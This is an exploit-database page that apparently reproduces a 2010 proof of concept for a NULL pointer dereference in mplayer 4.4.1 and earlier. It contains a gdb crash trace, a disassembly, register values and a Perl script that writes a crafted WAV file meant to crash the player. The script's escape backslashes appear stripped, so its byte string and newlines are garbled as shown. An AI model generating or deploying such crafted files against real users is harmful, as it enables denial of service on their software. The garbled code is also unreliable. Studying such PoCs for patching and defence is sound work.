mplayer <= 4.4.1 NULL pointer dereference exploit poc

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : mplayer <= 4.4.1 NULL pointer dereference exploit poc
# Published : 2010-03-18
# Author : Pietro Oliva
# Previous Title : eDisplay Personal FTP server 1.0.0 Multiple Post-Authentication Crash SEH (PoC)
# Next Title : WFTPD 3.3 Remote REST DoS

# Exploit Title: mplayer <= 4.4.1 NULL pointer dereference exploit poc 0 day
# Date: 17/03/2010
# Author: Pietro Oliva
# Software Link: 
# Version: <= 4.4.1
# Tested on: ubuntu 9.10 but should work in windows too
# CVE :  

#Program received signal SIGSEGV, Segmentation fault.
#0x081176d8 in af_calc_filter_multiplier ()
#(gdb) disas af_calc_filter_multiplier 
#Dump of assembler code for function af_calc_filter_multiplier:
#0x081176d0 <af_calc_filter_multiplier+0>:	push   %ebp
#0x081176d1 <af_calc_filter_multiplier+1>:	mov    %esp,%ebp
#0x081176d3 <af_calc_filter_multiplier+3>:	fld1   
#0x081176d5 <af_calc_filter_multiplier+5>:	mov    0x8(%ebp),%eax
#0x081176d8 <af_calc_filter_multiplier+8>:	mov    (%eax),%eax	==> mplayer tries to dereference eax, which is a NULL pointer!!! 	
#0x081176da <af_calc_filter_multiplier+10>:	lea    0x0(%esi),%esi
#0x081176e0 <af_calc_filter_multiplier+16>:	fmull  0x28(%eax)
#0x081176e3 <af_calc_filter_multiplier+19>:	mov    0x18(%eax),%eax
#0x081176e6 <af_calc_filter_multiplier+22>:	test   %eax,%eax
#0x081176e8 <af_calc_filter_multiplier+24>:	jne    0x81176e0 <af_calc_filter_multiplier+16>
#0x081176ea <af_calc_filter_multiplier+26>:	pop    %ebp
#0x081176eb <af_calc_filter_multiplier+27>:	ret    
#End of assembler dump.

# REGISTERS:
#eax            0x0	0	==========> NULL
#ecx            0xfa157a57	-99255721
#edx            0x1fe0	8160
#ebx            0x8509a08	139500040
#esp            0xbfffe2e8	0xbfffe2e8
#ebp            0xbfffe2e8	0xbfffe2e8
#esi            0x7b84000	129515520
#edi            0xf8000	1015808
#eip            0x81176d8	0x81176d8 <af_calc_filter_multiplier+8>
#eflags         0x10216	[ PF AF IF RF ]
#cs             0x73	115
#ss             0x7b	123
#ds             0x7b	123
#es             0x7b	123
#fs             0x0	0
#gs             0x33	51



#!/usr/bin/perl

print "[+] mplayer <= 4.4.1 NULL pointer dereference exploit poc 0 day by Pietro Olivan";
print "[+] pietroliva[at]gmail[dot]com  http://olivapietro.altervista.orgn";
print "[+] creating crafted file mplayer.wavn";
$buffer="x52x49x46x46x1fx04x00x00x57x41x56x45x66x6dx74x20x10x00x00x00x01x00x1f";
open(file,"> mplayer.wav");
print(file $buffer);
print "[+] done!n";